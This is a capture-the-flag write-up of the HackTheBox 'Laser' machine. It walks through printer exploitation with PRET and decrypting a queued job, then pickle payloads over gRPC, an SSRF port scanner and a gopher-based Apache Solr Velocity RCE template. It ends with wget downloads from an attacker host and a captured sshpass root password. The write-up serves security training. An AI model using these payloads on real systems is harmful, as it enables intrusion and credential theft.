HackTheBox Laser Writeup – 10.10.10.201

Hello friends, I’m back with another HackTheBox writeup. This time it is Laser (10.10.10.201) box. Laser machine’s difficulty categorized as “Insane”. This is the second Hardest box I’ve solved after Unbalanced. My Unbalanced writeup supposed to go online this week, but due to the length and few other issues I ‘ve postponed and started working on laser.

HackTheBox Laser – 10.10.10.201

From the name of the machine “Laser” one can point out that the machine is related to Printer exploit. The initial scan reveals only 3 ports are open which makes the attack window very narrow. Out of 3 ports one is common SSH and two are 9000 (unknown) and 9100 printer port.

So, let’s get started.

Enumeration

As always, the machine IP goes to the hosts file as laser.htb and I start the nmap scan.

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9000/tcp open  cslistener?
9100/tcp open  jetdirect?
1 service unrecognized despite returning data. 

The NMAP scan reveals the port 22, 9100 and 9000 are open. The Port 22 is SSH and the port 9100 is used for data transfer from host to printer. This is commonly used by HP and Epson. The Port 9000 is hosting a service called “cslistener”, I have no further information.

PRinterExploitation Toolkit (PRET)

Looking for exploits, I found a couple of articles that showcases the ways of exploiting network printers.

The PRET bridges the communication between the end-user and the printer. Using the PRET shell, PRET translates the commands to the Postscript, PJL or PCL, and sends it to the associated printer. And when the printer successfully starts communicating for the commands, PRET evaluates the result and translates it back to a user-friendly format.

PRET needs to be installed with a number of prerequisites.

  • sudo pip install colorama pysnmp
  • pip install win_unicode_console
  • sudo apt install imagemagick ghostscript

Installing PERT:

  • sudo git clone https://github.com/RUB-NDS/PRET.git

Playing with PRET:

After installing PRET I started to understand how it works. The PRET directory contains python codes, I started with pret.py, however among the PS, PCL and PJL only PJL was accepted. PJL is Printer Job Language (PJL) that is used to translate the job language between the host and the printer.

The usage: pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}

root@nav1n:~/htb/laser/PRET(master○) # python pret.py laser.htb pjl   
      ________________                                             
    _/_______________/|                                            
   /___________/___//||   PRET | Printer Exploitation Toolkit v0.40
  |===        |----| ||    by Jens Mueller <jens.a.mueller@rub.de> 
  |           |   ô| ||                                            
  |___________|   ô| ||                                            
  | ||/.´---.||    | ||      「 pentesting tool that made          
  |-||/_____\||-.  | |´         dumpster diving obsolete‥ 」       
  |_||=L==H==||_|__|/                                              
                                                                   
     (ASCII art by                                                 
     Jan Foerster)                                                 
                                                                   
Connection to laser.htb established
Device:   LaserCorp LaserJet 4ML

Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> ?

Available commands (type help <topic>):
=======================================
append  delete    edit    free  info    mkdir      printenv  set        unlock 
cat     destroy   env     fuzz  load    nvram      put       site       version
cd      df        exit    get   lock    offline    pwd       status   
chvol   disable   find    help  loop    open       reset     timeout  
close   discover  flood   hold  ls      pagecount  restart   touch    
debug   display   format  id    mirror  print      selftest  traversal

laser.htb:/> 

The Printer has its own directory called “Jobs” where the queued jobs are stored. This can be access using LS command.

Connection to laser.htb established
Device:   LaserCorp LaserJet 4ML

Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> ls ../../
PJL Error: Volume not available
laser.htb:/> ls
d        -   pjl
laser.htb:/> cd d
PJL Error: Volume not available
Failed to change directory.
laser.htb:/> cd pjl
laser.htb:/pjl> ls
d        -   jobs
laser.htb:/pjl> cd jobs
laser.htb:/pjl/jobs> ls
-   172199   queued
laser.htb:/pjl/jobs> cd queued
Failed to change directory.
laser.htb:/pjl/jobs> cat queued
b'VfgBAAAAAADOiDS0d+nn3sdU24Myj/njDqp6+zamr0JMcj84pLvGcvxF5IEZAbjjAHnfef9tCBj4u+wj/uGE1BLmL3Mtp/YL+wiVXD5MKKmdevvEhIONVNBQv26yTwdZFPYrcPTC9BXqk/vwzfR3BWoDRajzyLWcah8TOugtXl0ndmVwYajU0LvStgspvXIGsjl8VWFRi/kQJr+YsAb2lQu+Kt2LCuyooPLKN3EO/puvAOSdICSoi7RKfzg937j7Evcc0x5a3YAIes/j5rGroQuOrWwPlmbC5cvnpqkgBmZCuHCGMqBGRtDOt3vLQ/tI9+u99/0Ss6sIpOladA5aFQd..........

Upon CATing I noticed the queued is some sort of encrypted file, so I decided to download it to local machine and analyze it. Looking the file queue through HEXDUMP, I found the encryption is base64.

root@nav1n:~/htb/laser/PRET(master) # hexdump -vC queued
00000000  62 27 56 66 67 42 41 41  41 41 41 41 44 4f 69 44  |b'VfgBAAAAAADOiD|
00000010  53 30 64 2b 6e 6e 33 73  64 55 32 34 4d 79 6a 2f  |S0d+nn3sdU24Myj/|
00000020  6e 6a 44 71 70 36 2b 7a  61 6d 72 30 4a 4d 63 6a  |njDqp6+zamr0JMcj|
00000030  38 34 70 4c 76 47 63 76  78 46 35 49 45 5a 41 62  |84pLvGcvxF5IEZAb|
00000040  6a 6a 41 48 6e 66 65 66  39 74 43 42 6a 34 75 2b  |jjAHnfef9tCBj4u+|
00000050  77 6a 2f 75 47 45 31 42  4c 6d 4c 33 4d 74 70 2f  |wj/uGE1BLmL3Mtp/|
00000060  59 4c 2b 77 69 56 58 44  35 4d 4b 4b 6d 64 65 76  |YL+wiVXD5MKKmdev|
00000070  76 45 68 49 4f 4e 56 4e  42 51 76 32 36 79 54 77  |vEhIONVNBQv26yTw|
00000080  64 5a 46 50 59 72 63 50  54 43 39 42 58 71 6b 2f  |dZFPYrcPTC9BXqk/|
00000090  76 77 7a 66 52 33 42 57  6f 44 52 61 6a 7a 79 4c  |vwzfR3BWoDRajzyL|
000000a0  57 63 61 68 38 54 4f 75  67 74 58 6c 30 6e 64 6d  |Wcah8TOugtXl0ndm|

There is a GET command which I saw in the help, I used GET to download the queue.

Going further I decided to enumerate more on the printer itself using PRET, so decided to run available commands. The command NVRAM. As per the documentation NVRAM command dumps all NVRAM to local file. So I ran it.

laser.htb:/> nvram
NVRAM operations:  nvram <operation>
  nvram dump [all]         - Dump (all) NVRAM to local file.
  nvram read addr          - Read single byte from address.
  nvram write addr value   - Write single byte to address.
laser.htb:/> nvram dump
Writing copy to nvram/laser.htb
..........................................................................................................k...e....y.....13vu94r6..643rv19u
laser.htb:/> 

The file was dumped as laser.htb and there was a something called “KEY” : 13vu94r6.643rv19u, but no idea what it is, I believe it’s the key or passphrase to decode queue file or something. So lets find it out.

I copied the hexdump of queued used base64 for covert the file into raw and then from the hexdump I obtained the first 8 bytes of the file: 55 f8 01 00 00 00 00 00 –> 55f8010000000000.

The idea is to decrypt the raw file. However, after discussing with a friend, we decided that, since the encryption used is AES128 the additional block size must be dropped. As we know the AES128 consists of block size of 128 bits (16 bytes). So from the hexdump it shows the first 8 bytes and the rest is package.

Using the Python Struct module the file can be unpacked. Here is the unpacked hex:

root@nav1n:~/htb/laser/PRET(master) # hexdump queued.unpacked -n 100 
0000000 88ce b434 e977 dee7 54c7 83db 8f32 e3f9
0000010 aa0e fb7a a636 42af 724c 383f bba4 72c6
0000020 45fc 81e4 0119 e3b8 7900 79df 6dff 1808
0000030 bbf8 23ec e1fe d484 e612 732f a72d 0bf6
0000040 08fb 5c95 4c3e a928 7a9d c4fb 8384 548d
0000050 50d0 6ebf 4fb2 5907 f614 702b c2f4 15f4
0000060 93ea f0fb                              
0000064
root@nav1n:~/htb/laser/PRET(master) # 

HEX: 88ce b434 e977 dee7 54c7 83db 8f32 e3f9 and extracting the first 16 characters, finally I have the ciphertext: ce8834b477e9e7dec754db83328ff9e3

root@nav1n:~/htb/laser/PRET(master) # xxd -l 16 queued.unpacked 
00000000: ce88 34b4 77e9 e7de c754 db83 328f f9e3  ..4.w....T..2...
root@nav1n:~/htb/laser/PRET(master) # 

Decrypting The Queue File

As I now have everything , I proceed to decrypt the Queue file downloaded from Printer Jobs.

ce8834b477e9e7dec754db83328ff9e3:13vu94r6.643rv19u

The Easiest way to decrypt AES encrypted file is OpenSSL, however I got in to an error while decrypting.

root@nav1n:~/htb/laser/PRET(master) # openssl aes-128-cbc -d -nopad -iv ce8834b477e9e7dec754db83328ff9e3 -K 13vu94r6.643rv19u -in queued.raw3 -out queued.decrypted3
hex string is too short, padding with zero bytes to length
non-hex digit
invalid hex key value

This error suggests the key (13vu94r6643rv19u) should be in hex format, so let us convert the key to hex:

root@nav1n:~/htb/laser/PRET(master) # echo 13vu94r6643rv19u | xxd
00000000: 3133 7675 3934 7236 3634 3372 7631 3975  13vu94r6643rv19u
root@nav1n:~/htb/laser/PRET(master) #

HEX VALUE: 31337675393472363634337276313975

root@nav1n:~/htb/laser # openssl aes-128-cbc -d -nopad -iv ce8834b477e9e7dec754db83328ff9e3 -K 31337675393472363634337276313975 -in queued.unpacked -out queued.decrypted 
root@nav1n:~/htb/laser # ls
laser.nmap.gnmap  laser.nmap.nmap  laser.nmap.xml  PRET  queued.decrypted  queued.unpacked
root@nav1n:~/htb/laser # 

The file successfully decrypted as queued.decrypted. Upon checking the directory the file was a PDF format.

The PDF file:

The PDF file is a documentation of an application called “Feed Engine v1.0”. After reading the file, it has come to my attention that, the Port 9000 is being used by this service. There is a section that shows how to use the service. Further reading reveals a new domain name laserinternal.htb in the sample feed information. I immediately add the newly found domain to mt hosts file.

The domain is not accessible directly from the URL, but using the port:9000 I was able to access, but looks like an application or encrypted data.

Going back to the PDF, there is a mention of “Protocol Buffers and gRPC framework”. I made a quick Google search which led to the gRPC website as a top result. Going through the articles on the website, I understood the gRPC is an open source universal RPC framework that supports, several languages like, Python, C++, PHP, Node, Ruby, Go, Dart etc.

We are still unsure which language being used in the Laser machine as a backend for gRPC framework, however a little guesswork from the PDF file, the terms used like “builtins” and “unpickled” are the hints towards Python. So, for a better understanding of gRPC framework I started to read articles on gRPC Python Protocol from this link.

What I understood was, gRPC Python relies on the protocol buffers compiler (protoc) to generate code. There should a For a .proto service description containing gRPC services, the plain protoc generated code is synthesized in a _pb2.py file, and the gRPC-specific code lands in a _pb2_grpc.py file. The latter python module imports the former.

Also, reading from the PDF a return address mentioned as service_pb2.Data, A quick googling took me to the Google Developers page where the term is used. Doing more research I found several useful articles and codes from the Google Developers, semantics3.com and Github.

As per the PDF file, “We defined a Print service which has an RPC method called Feed . This method takes Content
as input parameter and returns Data from the server.”. This says, we can get a return data from the Server using RPC. The content need to be defined by us. However, the data is expected only in JSON format and is not able to exploit as the serialization is using Python “Pickle” module.

Creating A Protocol Buffer File

After going through a load of documentations, I decided to move on with the limited knowledge I so far gained. What I learned was, to communicate with the Server and get message as per the PDF I need to have a “Protocol_Buffers” setup in my Kali. Referring to Google documents and the Wikipedia page I made one for myself.

Example:

//polyline.proto
syntax = "proto2";

message Point {
  required int32 x = 1;
  required int32 y = 2;
  optional string label = 3;
}

message Line {
  required Point start = 1;
  required Point end = 2;
  optional string label = 3;
}

message Polyline {
  repeated Point point = 1;
  optional string label = 2;
}

I made a ProtoBuff file as laser.proto with following param.

//polyline.proto
syntax = "proto3";
message Content {
        string data = 1;
}
message Data {
        string feed = 1;
}

Generate gRPC classes for Python

To generate gRPC classes, I need two tools preinstalled, GRPCio and GRPCIO-Tools, I used PIP to install both as stated in this article and this article.

After installing the tools, I run the below command which generated two more python files: laser_pb.py and laser_pb2_grpc.py.

python2 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto

Laser_pb2.py

root@nav1n:~/htb/laser # cat laser_pb2.py 
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: laser.proto

from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
  name='laser.proto',
  package='',
  syntax='proto3',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\x0blaser.proto\"\x17\n\x07\x43ontent\x12\x0c\n\x04\x64\x61ta\x18\x01 \x01(\t\"\x14\n\x04\x44\x61ta\x12\x0c\n\x04\x66\x65\x65\x64\x18\x01 \x01(\t2\"\n\x05Print\x12\x19\n\x04\x46\x65\x65\x64\x12\x08.Content\x1a\x05.Data\"\x00\x62\x06proto3'
)
_CONTENT = _descriptor.Descriptor(
  name='Content',
  full_name='Content',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='data', full_name='Content.data', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=15,
  serialized_end=38,
)

_DATA = _descriptor.Descriptor(
  name='Data',
  full_name='Data',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='feed', full_name='Data.feed', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=40,
  serialized_end=60,
)
DESCRIPTOR.message_types_by_name['Content'] = _CONTENT
DESCRIPTOR.message_types_by_name['Data'] = _DATA
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

Content = _reflection.GeneratedProtocolMessageType('Content', (_message.Message,), {
  'DESCRIPTOR' : _CONTENT,
  '__module__' : 'laser_pb2'
  # @@protoc_insertion_point(class_scope:Content)
  })
_sym_db.RegisterMessage(Content)

Data = _reflection.GeneratedProtocolMessageType('Data', (_message.Message,), {
  'DESCRIPTOR' : _DATA,
  '__module__' : 'laser_pb2'
  # @@protoc_insertion_point(class_scope:Data)
  })
_sym_db.RegisterMessage(Data)
_PRINT = _descriptor.ServiceDescriptor(
  name='Print',
  full_name='Print',
  file=DESCRIPTOR,
  index=0,
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_start=62,
  serialized_end=96,
  methods=[
  _descriptor.MethodDescriptor(
    name='Feed',
    full_name='Print.Feed',
    index=0,
    containing_service=None,
    input_type=_CONTENT,
    output_type=_DATA,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
])
_sym_db.RegisterServiceDescriptor(_PRINT)

DESCRIPTOR.services_by_name['Print'] = _PRINT

# @@protoc_insertion_point(module_scope)
root@nav1n:~/htb/laser # 

Laser_pb2_grpc.py

root@nav1n:~/htb/laser # cat laser_pb2_grpc.py 
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc

import laser_pb2 as laser__pb2


class PrintStub(object):
    """Missing associated documentation comment in .proto file."""

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.Feed = channel.unary_unary(
                '/Print/Feed',
                request_serializer=laser__pb2.Content.SerializeToString,
                response_deserializer=laser__pb2.Data.FromString,
                )


class PrintServicer(object):
    """Missing associated documentation comment in .proto file."""

    def Feed(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_PrintServicer_to_server(servicer, server):
    rpc_method_handlers = {
            'Feed': grpc.unary_unary_rpc_method_handler(
                    servicer.Feed,
                    request_deserializer=laser__pb2.Content.FromString,
                    response_serializer=laser__pb2.Data.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'Print', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


 # This class is part of an EXPERIMENTAL API.
class Print(object):
    """Missing associated documentation comment in .proto file."""

    @staticmethod
    def Feed(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Print/Feed',
            laser__pb2.Content.SerializeToString,
            laser__pb2.Data.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
root@nav1n:~/htb/laser # 

Getting The Reverse Shell

Now, it’s time to connect the server and get the response, if I was able to communicate in any manner I could move forward or else I just need to spend more time on reading and understanding gRPC. Going further, after a several tries, I was able to find a way to get the reverse shell (I call it reverse ping back) on the machine.

The reverse.py – gRPC client sample script references:

https://gist.githubusercontent.com/ramananbalakrishnan/19e0952b61f51be8e71b8e4fcaa738e8/raw/a1c5d62033d9250b8d4cc8d425f5518727d40ad0/client.py

https://stackoverflow.com/questions/57477505/does-grpc-with-no-encryption-or-authenticationinsecurechannel-works-between-2

#!/usr/bin/env python3
import grpc, sys

# import the generated classes
import laser_pb2, laser_pb2_grpc

# import the pickle and base64 classes
import pickle, base64 

# opening a gRPC channel
ch = grpc.insecure_channel('10.10.10.201:9000')

# create a stub (client)
stub = laser_pb2_grpc.PrintStub(ch)

#payloads
pl = sys.argv[1]
pl = base64.b64encode(pickle.dumps(pl))

#connection
ch = grpc.insecure_channel

#adding contents in to our classes
content = laser_pb2.Content(data=pl)
try:
        response = stub.Feed(content)
        print(response)
except Exception as ex:
        print(ex)

Once the gRPC client is ready, I run the listener in another terminal and execute my script with the arguments given as per the PDF:

And I have a connection back in my listener. I cannot run any command which is understandable, but I am now able to communicate with the server using my gRPC client which accepts my external commands as feed.

Despite getting the reverse connection, I was not able to proceed further, tried different exploitation methods but nothing worked. Looking desperately for help, one of the HTB users pointed me to look for the services running in the target machine.

As the machine is not responding to any external scanners to reveal ports other than 22, 9000 and 9001. So if I need to perform a scan, it should be internal ports and service. Other than the gRPC client I don’t think if anything else would work,so I decided to modify the gRPC client in to a port scanner.

Final Port scanner script:

Referring to this article, I amend a couple of lines in the reverse.py and made the following script to scan local host for internally listening ports and services.

#!/usr/bin/env python3
import grpc, sys, socket
import pyfiglet 
# import the generated classes
import laser_pb2, laser_pb2_grpc
# import the pickle and base64 classes
import pickle, base64 
# opening a gRPC channel
from datetime import datetime
# Add Banner
ascii_banner = pyfiglet.figlet_format("PORT SCANNER") 
print(ascii_banner)
print("\n + nav1n !!!!")
print("-" * 50) 
print("Scanning Started:")
print("Scanning started at:" + str(datetime.now()))
print("-" * 50)
ch = grpc.insecure_channel('10.10.10.201:9000')
# create a stub (client)
stub = laser_pb2_grpc.PrintStub(ch)
#connection
ch = grpc.insecure_channel

for port in range(1, 65536):
	#payloads
	pl = '{"feed_url":"http://localhost:' + str(port) +'"}'

Running the scanner for like 30 minutes, I got the following result. Along with the port 22, 9000 and 9001; I now have 2 new open and listening ports 7983 and 8983.

Port 8983 – Apache Solr

Among the two ports, the port 7983 comes with no valuable results, but the port 8983 normally used as the default port of Apache Solr: https://lucene.apache.org/solr/guide/6_6/running-solr.html

This means, the Apache Solr is running locally in the machine. Apache Solr is an enterprise search platform developed by Apache based on Apache Lucene. It’s hard to confirm if the Solr in the machine is vulnerable as I’m not able to connect it externally.

Looking for exploits, I found Apache Solr 8.2.0 – Remote Code Execution in the Exploit-DB. The vulnerability was given CVE ID: CVE-2019-17558. Testing for a while, found out this exploit does not work out the box, as the exploit needs direct access to the machine and the port. In my case, I can only connect the Solr service port using gRPC client as the service and the port listening locally.

Velocity RCE Template:

So what I need is a script that based on the PoC but connects the machine using gRPC params. Working with a couple of discord buddies we finally made a script that works.

I break the script so it’s easy to understand:

def feed(url):
        mp = '{"feed_url":"' + url.replace('"', '\\"') + '"}'
        p = base64.b64encode(pickle.dumps(mp))
        try:
                import grpc
                service_pb2 = proto2_pb2
                service_pb2_grpc = proto2_pb2_grpc
                print(mp)
                channel = grpc.insecure_channel(grpc_addr)
                stub = proto2_pb2_grpc.PrintStub(channel)
                content = proto2_pb2.Content(data=p)
                try:
                        response = stub.Feed(content, timeout=5)
                        print(response)
                        return
                except Exception as ex:
                        print(ex)
        except:
                import subprocess
                cmd = '/bin/grpcurl -max-time 5 -plaintext -proto service.proto -d \'{"data":"' + p.decode() + '"}\' ' + grpc_addr + ' Print.Feed'
                print(cmd)
                out = subprocess.call(cmd, shell=True)

def gopher(addr, req):
       feed('gopher://{0}/_{1}'.format(addr, req).replace('%', '%25').replace('\n', '%0d%0a'))

def post_data(addr, headers, mp):
        gopher(addr, '{0}\nContent-Length: {1}\n\n{2}'.format(headers.strip(), len(mp), mp))

def get_data(addr, headers, query):
        gopher(addr, 'GET {0} HTTP/1.1\n{1}\n'.format(query.replace(' ', '%20'), headers.strip()))

The header:

headers = """
POST /solr/test/config HTTP/1.1
Host: localhost:8983
Content-Type: application/json
""".strip().replace('/solr/test/', '/solr/' + solr_core + '/')

mp = """
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}""".strip().replace('\n', '').replace(' ', '')

The velocity RCE template was referred from this article: https://anemone.top/vulnresearch-Solr_Velocity_injection/

Other references:

headers = "Host: localhost:8983"
template = """
#set($x='') 
#set($rt=$x.class.forName('java.lang.Runtime')) 
#set($chr=$x.class.forName('java.lang.Character')) 
#set($str=$x.class.forName('java.lang.String')) 
#set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor() 
#set($out=$ex.getInputStream()) 
#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
""".strip().replace('\n', '+').replace('#', '%23').replace('<CMD>', cmd)
query = '/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=' + template
query = query.replace('/solr/test/', '/solr/' + solr_core + '/')

User.txt

Running the script, I got reverse shell as Solr in my listener. The user flag was found in the /home/solr/.

Getting Better Shell As SSH

I upgrade the shell to full TTY by running python -c ‘import pty; pty.spawn(“/bin/bash”)’ and

As the user Solr is able to read and write the .ssh, I used the ED25519 algorithm to generate SSH keys and add it in the authorized_keys of Solr.

root@nav1n:~/htb/laser # ssh-keygen -t ed25519 -C "nav1n" -P ""                                                   148 ↵
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): 
/root/.ssh/id_ed25519 already exists.
Overwrite (y/n)? y
Your identification has been saved in /root/.ssh/id_ed25519.
Your public key has been saved in /root/.ssh/id_ed25519.pub.
The key fingerprint is:
SHA256:6ob*********8gO3qw nav1n
The key's randomart image is:
+--[ED25519 256]--+
|==o.**  .+.      |
|oX=+o++o+.o      |
|=.@.o.+o.o .     |
| o *  .+..       |
|  .   ..S        |
| E    .+ o       |
|     +..o        |
|    ..+ .        |
|     ...         |
+----[SHA256]-----+
root@nav1n:~/htb/laser # 

And SSH as Solr:

root@nav1n:~/htb/laser # ssh solr@10.10.10.201
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Aug 2020 01:53:59 PM UTC

  System load:                      0.05
  Usage of /:                       44.7% of 19.56GB
  Memory usage:                     51%
  Swap usage:                       0%
  Processes:                        232
  Users logged in:                  0
  IPv4 address for br-3ae8661b394c: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.201
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:1961

 * Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
   sudo snap install microk8s --channel=1.19/candidate --classic

   https://www.microk8s.io/ has docs and details.

73 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug  4 07:01:35 2020 from 10.10.14.3
solr@laser:~$ 

PSpy

After some research and some coffees, I decided to run PSpy to see cron jobs and processes as they may have some leads. So I download the PSpy from DominicBreuker’s repo and used WGet to import it to the box.

solr@laser:~$ wget http://10.10.14.21:8000/pspy64s
--2020-08-23 13:58:58--  http://10.10.14.21:8000/pspy64s
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’
pspy64s                       100%[=======================================================>]   1.10M   307KB/s    in 3.7s    
2020-08-23 13:59:01 (307 KB/s) - ‘pspy64s’ saved [1156536/1156536]
solr@laser:~$
solr@laser:~$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/08/23 14:10:37 CMD: UID=0    PID=959    | /lib/systemd/systemd-logind 
2020/08/23 14:10:37 CMD: UID=0    PID=957    | /usr/lib/snapd/snapd 
2020/08/23 14:10:37 CMD: UID=104  PID=956    | /usr/sbin/rsyslogd -n -iNONE 
2020/08/23 14:10:37 CMD: UID=0    PID=955    | /usr/sbin/irqbalance --foreground 
2020/08/23 14:10:37 CMD: UID=103  PID=942    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 

Running PSpy, I immediately noticed an interesting process “sshpass” but the password seems to be hidden. The job runs every 10 seconds.

2020/08/23 14:12:21 CMD: UID=0    PID=24209  | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/

The SSHPass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. Its also known that SSHPass is unsecure. SSHPass makes a minimal attempt to hide the password. Running the PSpy for sometime, SSHPass was unmasked:

123SSS

So we found the docker container root password. This is the password for the docker container IP: 172.18.0.2 and the host name is br-3ae8661b394c. Logging to docker container using the sshpass and the username root was successful.

IMG123

The root access to docker container is no use, so going back to Solr and looking at the processes, we can notice the following:

2020/08/23 16:46:01 CMD: UID=0    PID=142684 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh 
2020/08/23 16:46:01 CMD: UID=0    PID=142704 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 /tmp/clear.sh 
2020/08/23 16:46:01 CMD: UID=0    PID=142722 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 rm /tmp/clear.sh 

There are 3 processes are running one by one. The cronjob uploads /tmp/clear.sh and in next processes it executes the /tmp/clear.sh and in the 3rd job it removes the /tmp/clear.sh file. So we should concentrate on these processes.

So the plan is;

We already obtained the docker credentials, we can redirect ssh to the host. This will make the cron job to connect the 127.0.0.1. The localhost connection will be done by the private key without using the password. So once the connection is done the clear.sh will be executed on the host now can be controlled by us.

Socat and Privilege Escalation

SoCAT = SocketCat. This tool normally used to transfer data between two hosts (or addresses). The example usage of socat would be like this:

socat -d -d - TCP4:10.10.10.10:80 

socat [options] <address> <address>

So I’m going to use Socat to do port “redirection”. I’m going to upload it to the to docker instance and give it executable permission.

solr@laser:~$ 
solr@laser:~$ wget http://10.10.14.21:8000/socat
--2020-08-23 17:37:22--  http://10.10.14.21:8000/socat
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                    100%[===============================>] 366.38K   329KB/s    in 1.1s    

2020-08-23 17:37:24 (329 KB/s) - ‘socat’ saved [375176/375176]

solr@laser:~$ ls
data  log4j2.xml  logs	pspy64s  pspy64s.1  socat  solr-8983.pid  solr-8984.pid
solr@laser:~$ chmod +x socat
solr@laser:~$ ls -la
total 2680
drwxr-x---  8 solr solr    4096 Aug 23 17:37 .
drwxr-xr-x 14 root root    4096 Jun 26 13:02 ..
lrwxrwxrwx  1 solr solr       9 Jun 29 06:57 .bash_history -> /dev/null
drwxrwxr-x  3 solr solr    4096 Jul  6 07:06 .cache
drwxr-x---  5 solr solr    4096 Jun 29 04:50 data
drwx------  4 solr solr    4096 Jun 29 06:57 .local
-rw-r-----  1 solr solr    5027 Jun 26 13:02 log4j2.xml
drwxr-x---  2 solr solr    4096 Aug 23 13:46 logs
drwxrwxr-x  2 solr solr    4096 Jun 26 13:02 .oracle_jre_usage
-rwxrwxr-x  1 solr solr 1156536 Aug 22  2019 pspy64s
-rw-rw-r--  1 solr solr 1156536 Aug 22  2019 pspy64s.1
-rwxrwxr-x  1 solr solr  375176 Aug 23 17:31 socat
-rw-rw-r--  1 solr solr       5 Aug 23 13:44 solr-8983.pid
